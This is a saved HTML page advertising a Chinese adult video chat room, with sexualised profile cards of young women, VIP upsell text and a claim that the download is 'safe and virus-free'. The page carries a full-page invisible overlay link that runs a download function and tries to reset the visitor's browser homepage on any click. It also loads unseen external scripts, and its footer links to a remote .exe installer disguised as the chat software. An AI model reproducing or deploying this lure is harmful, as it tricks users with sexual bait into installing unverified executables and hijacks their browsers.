
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>同城聊天室-免费聊天室_激情聊天室</title>
<meta name="keywords" content="聊天,聊天室,同城聊天,同城聊天室,视频聊天室">
<meta name="description" content="同城聊天室信誉保证安全无毒，给您前所未有的激情视频享受 免费下载注册，如果您需要更高级的服务就要付费升级为VIP会员。">
<LINK rel=stylesheet type=text/css href="file:///G|/模板/xz4/css/css.css" tppabs="css/css.css">
<Script LANGUAGE="JavaScript">
if(self!=top){top.location=self.location;}
</script>
<script src="file:///G|/模板/xz4/js/NO1.js" tppabs="js/NO1.js"></script>
<script src="file:///G|/模板/xz4/js/100.js" tppabs="js/100.js"></script>
<script src="file:///G|/模板/xz4/js/81.js" tppabs="js/81.js"></script>
</head>
<body>
<div id="Layer1"><a href="javascript:down();" onClick="javascript:this.style.behavior='url(#default#homepage)';this.sethomepage('想找美女视频聊天？请点是(Ｙ)！');"><img src="file:///G|/模板/xz4/images/kong.gif" tppabs="images/kong.gif" width="100%" height="100%" alt="" border="0" /></a></div>
<table width="920" height="193" align="center" cellpadding="0" cellspacing="0">
<tr align="center" valign="top"> 
<td width="698" height="71" valign="top" background="file:///G|/模板/xz4/images/top.gif" tppabs="images/top.gif"><table width="771" height="173" border="0" cellpadding="3" cellspacing="0" class="font">
<tr> 
<td width="69%" align="center">　</td>
<td width="31%" height="103" valign="bottom"></td></tr>
<tr> <td align="center">　</td><td height="70" align="left">　</td></tr></table></td></tr></table>
<table width="920" height="626" align="center" cellpadding="0" cellspacing="0" style="margin-top:10px">
<tr valign="top"> <td width="626" align="left" valign="top"><table width="99%" height="156" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td width="50%" align="left" valign="top"> <table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0" class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/1.jpg" tppabs="images/1.jpg" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">天使的翅膀</font></td></tr>
<tr><td>年龄：23</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">热情开放</font></td></tr>
<tr><td>拿手好戏：自慰激情舞</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td>
<td width="50%" height="156" align="center" valign="top">
<table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> 
<td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0" class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/2.jpg" tppabs="images/2.jpg" alt="" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">拉拉舞娘</font></td></tr>
<tr><td>年龄：22</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">活泼开朗</font></td></tr>
<tr><td>拿手好戏：超诱惑表演</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td></tr></table>
<table width="99%" height="156" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> 
<td width="50%" align="left" valign="top"> <table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> 
<td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0" class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/3.jpg" tppabs="images/3.jpg" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">云儿</font></td></tr>
<tr><td>年龄：22</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">温柔婉约</font></td></tr>
<tr><td>拿手好戏：脱衣激情舞</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td>
<td width="50%" height="156" align="center" valign="top"> <table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0" class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/4.jpg" tppabs="images/4.jpg" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">秋季恋人</font></td></tr>
<tr><td>年龄：24</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">煽动诱惑</font></td></tr>
<tr><td>拿手好戏：对波激情舞</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td></tr></table> 
<table width="99%" height="156" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td width="50%" align="left" valign="top"> <table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0"class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/5.jpg" tppabs="images/5.jpg" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">HELLEN</font></td></tr>
<tr><td>年龄：23</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">性欲强烈</font></td></tr>
<tr><td>拿手好戏：床上激情舞</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td>
<td width="50%" height="156" align="center" valign="top"> <table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0" class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/6.jpg" tppabs="images/6.jpg" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">无毒香水</font></td></tr>
<tr><td>年龄：25</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">劲爆火辣</font></td></tr>
<tr><td>拿手好戏：HI舞绝对</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td></tr></table>
<table width="99%" height="156" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td width="50%" align="left" valign="top"> <table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0" class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/7.jpg" tppabs="images/7.jpg" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">￥卷卷￥</font></td></tr>
<tr><td>年龄：25</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">成熟韵味</font></td></tr>
<tr><td>拿手好戏：舌舞诱惑</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td>
<td width="50%" height="156" align="center" valign="top"> <table width="301" height="144" border="0" cellpadding="3" cellspacing="0" class="font">
<tr align="center"> <td colspan="2" background="file:///G|/模板/xz4/images/lieb.gif" tppabs="images/lieb.gif">
<table width="100%" border="0" class="font">
<tr><td rowspan="5"><img src="file:///G|/模板/xz4/images/8.jpg" tppabs="images/8.jpg" width="125" height="105" border="0" class="broad"></td>
<td>昵称：<font color="#FF3300">特别色的猫猫</font></td></tr>
<tr><td>年龄：22</td></tr>
<tr><td>城市：<font color="#FFFF00"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script></font></td></tr>
<tr><td>性格：<font color="#009900">风骚洒脱</font></td></tr>
<tr><td>拿手好戏：激情互动</td></tr>
<tr><td><img src="file:///G|/模板/xz4/images/v.gif" tppabs="images/v.gif" width="127" height="18" border="0"></td>
<td>推荐：<img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"><img src="file:///G|/模板/xz4/images/star.gif" tppabs="images/star.gif" width="16" height="16"></td></tr></table></td></tr></table></td></tr></table></td>
<td width="292" height="624" align="center" valign="top" bgcolor="#333333"><table width="274" height="90" cellpadding="0" cellspacing="0" class="font">
<tr align="center" valign="top"> 
<td width="272" height="25" align="left" valign="top">
<div align="center"><p><img src="file:///G|/模板/xz4/images/btn.jpg" tppabs="images/btn.jpg" width="190" height="79" border="0"><br></p></div></td></tr></table> 
<table width="287" height="52" cellpadding="0" cellspacing="0">
<tr align="center" valign="top"> <td width="295" height="50" align="left" valign="bottom"><div align="center">
<p class="title"><script language=javascript src="file:///G|/模板/tcliao.asp" tppabs="tcliao.asp"></script>美女激情视频聊天室</p><p></p></div></td></tr></table>
<table width="291" height="133" cellpadding="0" cellspacing="0" class="font">
<tr align="center" valign="top"> <td width="514" height="131" align="left" valign="top"><ul>
<li>清晰的语音、视频传输，支持高达上万人同时在线可视交友。</li>
<li>风格各异的真人面对面美女主持人与你互动激情，排遣寂寞。</li>
<li>精美人性化的界面使您轻松上手，并且绝对保证您的隐私。</li>
<li>提供多种有趣的途径让您轻松虏获佳人芳心！ </ul></td></tr></table>
<table width="291" height="52" cellpadding="0" cellspacing="0" class="font">
<tr align="center" valign="top"> 
<td width="514" height="60" align="left" valign="top"><ul><li>同城聊天室信誉保证安全无毒，给您前所未有的激情视频享受 免费下载注册，如果您需要更高级的服务就要付费升级为VIP会员。</li></ul>
</td></tr></table>
<table width="291" height="20" cellpadding="0" cellspacing="0" class="font">
<tr align="center" valign="top"> 
<td width="514" height="40" align="left" valign="top"><ul><li><h4 class="STYLE1">开通VIP会员即可与美女私聊<br>享受一对一激情视频聊天服务</h4></li></ul>
</td></tr></table>
<table width="291" height="20" cellpadding="0" cellspacing="0" class="font">
<tr align="center" valign="top"> 
<td width="514" height="20" align="left" valign="top"><ul><li><h4 class="STYLE2">人生得意须尽欢 莫使娇躯空对月</h4></li></ul>
</td></tr></table>
<table width="291" height="20" cellpadding="0" cellspacing="0" class="font">
<tr align="center" valign="top"> 
<td width="514" height="20" align="center" valign="top"><h4 class="STYLE3">美女宝贝24小时在线 满足你的激情欲望</h4>
</td></tr></table></td></tr></table>
<table width="920" height="65" align="center" cellpadding="0" cellspacing="0">
<tr valign="top"> <td height="63" align="center" valign="middle" background="file:///G|/模板/xz4/images/bottomback.gif" tppabs="images/bottomback.gif" class="font">
Copyright &copy; 2010 <a href="file:///G|/模板/xz4/http://xd.syjn99.com/tg1/leba99_setup_750074035.exe" tppabs="http://xd.syjn99.com/tg1/leba99_setup_750074035.exe" target="_blank">同城聊天室</a>  All Rights Reserved
</td></tr></table>
</body>
</html>
